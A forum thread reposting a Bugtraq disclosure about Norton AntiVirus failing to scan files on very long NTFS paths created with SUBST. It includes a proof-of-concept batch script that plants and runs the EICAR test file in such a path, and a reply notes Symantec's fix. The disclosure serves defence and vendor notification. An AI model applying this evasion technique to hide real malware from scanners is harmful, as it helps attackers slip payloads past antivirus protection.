Results 1 to 2 of 2

Thread: Norton AntiVirus & NTFS Long pathname exploit

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    1,255

    Norton AntiVirus & NTFS Long pathname exploit

    This was posted to bugtraq by Hans Somers on Jan 30th:

    ===BEGIN POST===

    Long path exploit on NTFS
    =====================
    The filesystem NTFS seems to be a hiding place for virusses if you use a file path which exceeds 256 charaters.

    What is the case?
    The filepath (drive + folderpath + filename) theoraticly can take up to 32000 charaters if the filesystem in use is NTFS. However, the way in wich Windows NT (4.0, 2000 and XP) access this filesystem a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error. In these Operating System there is a way to substitute a long folderpath, using the "SUBST" command. If you change your current drive to the substituted drive, the pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
    Normally this would not alarm anyone, however, i discovered that my favorite virusscanner (Norton AntiVirus) was not able to follow the deep path where i created the EICAR-test string. So i created a very simple batchfile to demonstrate this exploit. My virusscanner will only find this virus is the SUBST drive is availible during the scan.

    I have tested this on the following platforms:
    Windows NT 4.0 SP4
    Windows NT 4.0 SP6a
    Windows 2000 Professional SP2
    Windows XP Pro
    I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
    Norton AntiVirus 5.0
    Norton AntiVirus 7.5.1
    Norton Antivirus 8.00.58

    I suspect that other virusscanners will encounter the same "bug" so you
    might try the sample script that i created. Additionally, other tools (quotamanagers,
    inventory tools etc) that gather information from a NTFS partition might reveal the same
    bug.

    After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C-partition. I suspect that the Eicar-virus will not be found.
    Additionally, re-create the substituted drive and re-run the scan. Under normal conditions
    the Eicar-virus will be found and removed (depending on your settings).

    As far as i can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

    Responses on this posting at my address are welcome.

    Hans Somers (hans.somers@nl.abnamro.com)

    Sample script:
    ===========
    @echo off
    cls
    echo Start test-script NTFS-limit
    @echo Create a filepath to the limit of NTFS
    md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
    \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
    67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
    123456789
    cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
    \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
    67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
    123456789
    @echo Create the Eicar test-string for PoC. This should be detected
    normally if you
    have an active virusscanner.
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
    echo. >>EICAR.TXT
    @echo Activate the Eicar test-string
    copy EICAR.TXT EICAR1.COM >NUL
    @echo Create a subst-drive Q: for this path
    subst Q:
    c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
    \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
    67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
    123456789
    @echo Create e even deeper filepath (thus exceeding the limit of NTFS's
    explorer)
    md Q:\1234567890\1234567890\1234567890
    @echo Change current folder into "the deep"
    Q:
    cd Q:\1234567890\1234567890\1234567890
    @echo Create the Eicar test-string
    echo
    X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    >EICAR.TXT
    echo. >>EICAR.TXT
    @echo Activate the Eicar test-string
    copy EICAR.TXT EICAR2.COM >NUL
    EICAR2.COM
    echo .
    echo End of test-script

    ===END POST===

    I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  2. #2
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    It seems Symantec may have already fixed this exposure in it's NAVCE 7.51 Build 54. The following is quoted from their Platinum Support site.

    "Long Path names
    Symptom: Files and Folders with full path names longer than 259 characters would not be scanned, and no error was generated. In some cases, the client or server would crash.
    Solution: Additional error checking was added to detect these file names, log the error in the NAV and NT Event Logs (Scan Omission) and to ignore the scanning of the file to prevent crashes."

    DjM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •